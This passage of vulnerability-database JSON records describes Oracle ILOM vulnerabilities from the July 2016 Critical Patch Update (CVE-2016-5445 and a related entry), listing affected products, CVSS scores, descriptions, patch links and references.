0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "CNNVD", id: "CNNVD-201607-809", }, { db: "NVD", id: "CVE-2016-5445", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003873", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, ], trust: 0.6, }, cve: "CVE-2016-5445", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2016-5445", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1.9, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "VHN-94264", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "LOW", baseScore: 8.3, baseSeverity: "HIGH", confidentialityImpact: "LOW", exploitabilityScore: 3.9, id: "CVE-2016-5445", impactScore: 3.7, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5445", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-5445", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-809", trust: 0.6, value: "HIGH", }, { author: "VULHUB", id: "VHN-94264", trust: 0.1, value: "HIGH", }, { author: "VULMON", id: "CVE-2016-5445", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-94264", }, { db: "VULMON", id: "CVE-2016-5445", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "CNNVD", id: "CNNVD-201607-809", }, { db: "NVD", id: "CVE-2016-5445", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'Multiple' protocol. The 'Authentication' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation", sources: [ { db: "NVD", id: "CVE-2016-5445", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, { db: "VULHUB", id: "VHN-94264", }, { db: "VULMON", id: "CVE-2016-5445", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5445", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91991", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003873", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-809", trust: 0.7, }, { db: "VULHUB", id: "VHN-94264", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5445", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94264", }, { db: "VULMON", id: "CVE-2016-5445", }, { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "CNNVD", id: "CNNVD-201607-809", }, { db: "NVD", id: "CVE-2016-5445", }, ], }, id: "VAR-201607-0652", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94264", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:49:10.256000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63169", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5445", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "CNNVD", id: "CNNVD-201607-809", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5445", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91991", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5445", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5445", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94264", }, { db: "VULMON", id: "CVE-2016-5445", }, { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "CNNVD", id: "CNNVD-201607-809", }, { db: "NVD", id: "CVE-2016-5445", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94264", }, { db: "VULMON", id: "CVE-2016-5445", }, { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "CNNVD", id: "CNNVD-201607-809", }, { db: "NVD", id: "CVE-2016-5445", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94264", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5445", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91991", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003873", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-809", }, { date: "2016-07-21T10:14:59.303000", db: "NVD", id: "CVE-2016-5445", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-94264", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5445", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91991", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003873", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-809", }, { date: "2024-11-21T02:54:19.770000", db: "NVD", id: "CVE-2016-5445", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Authentication Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003873", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, ], trust: 0.6, }, }
var-201607-0605
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote authenticated users to affect availability via vectors related to Web. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'HTTP' protocol. The 'Web' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker can exploit this vulnerability to cause a denial of service and affect data availability
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0605", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: 